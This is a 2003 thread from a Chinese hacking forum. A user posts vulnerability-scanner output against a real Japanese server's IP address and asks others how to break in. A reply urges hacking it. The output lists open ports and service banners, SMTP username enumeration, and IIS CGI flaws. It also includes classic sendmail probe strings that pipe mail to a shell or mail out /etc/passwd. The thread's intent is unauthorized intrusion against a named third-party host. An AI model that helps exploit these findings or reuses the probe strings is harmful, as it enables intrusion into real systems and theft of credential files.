标题: 诸多漏洞，怎么办？ [打印本页]

---

作者: seeker    时间: 2003-8-24 14:06     标题: 诸多漏洞，怎么办？

[这个贴子最后由seeker在 2003/08/24 02:07pm 第 1 次编辑]

扫描目标：61.120.21.85
扫描选项：
FTP漏洞
SMTP漏洞
FINGER漏洞
CGI漏洞
开始扫描......
目标IP地址为：61.120.21.85
扫描目标主机开放的端口：
21号端口(ftp)开放!
25号端口(smtp)开放!
80号端口(未知)开放!
443号端口(未知)开放!
6667号端口(未知)开放!
开始扫描FTP漏洞：
FTP服务器的Banner：
220-GuildFTPd FTP Server (c) 2001
220-revicnt02
220-Version 0.995
测试匿名用户
没有匿名用户

开始扫描SMTP漏洞：
SMTP服务器的Banner：
220-revicnt02.revic.co.jp Microsoft SMTP MAIL ready at Sun, 24 Aug 2003 14:34:01 +0900 Version: 5.5.1877.197.19
220 ESMTP spoken here
214-This server supports the following commands:
214-HELO EHLO STARTTLS RCPT DATA RSET MAIL VRFY QUIT HELP ETRN
214 End of HELP information
可以使用RCPT命令获得用户名列表.
可以使用VRFY命令获得用户名列表.
501 Argument missing
503 Send hello first
尝试利用RCPT命令获得目标机上存在的一些常见用户名：
检查decode别名：


检查漏洞

检查debug漏洞

检查kill漏洞

检查wiz漏洞

检查rcpt to: /tmp/.rhosts漏洞

检查+ +漏洞

检查RSET漏洞

检查mail from: |/bin/mail hacker < /etc/passwd漏洞

检查RSET漏洞

检查mail from: |tail|sh漏洞

开始扫描FINGER漏洞：
目标没有开放FINGER服务...

开始扫描CGI漏洞：
WWW服务器的Banner：
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://61.120.21.85/index.html
Date: Sun, 24 Aug 2003 05:34:56 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 20 Aug 2003 07:44:08 GMT
ETag: "caae86d6ee66c31:3964"
Content-Length: 7572

开始CGI漏洞的扫描，由于扫描漏洞数量较多，请耐心等待...
发现/?PageServices漏洞
发现/iisadmpwd/achg.htr漏洞
发现/iisadmpwd/aexp.htr漏洞
发现/_vti_inf.html漏洞
发现/iisadmpwd/aexp2.htr漏洞
高手帮忙啊~！！！

---

作者: seeker    时间: 2003-8-24 14:08     标题: 诸多漏洞，怎么办？

此网是日本的

---

作者: 烟花    时间: 2003-8-24 18:33     标题: 诸多漏洞，怎么办？

它欠黑~~

---

作者: seeker    时间: 2003-8-24 22:35     标题: 诸多漏洞，怎么办？

昏~！
你知道怎么黑、？

---

欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)

Powered by Discuz! 7.2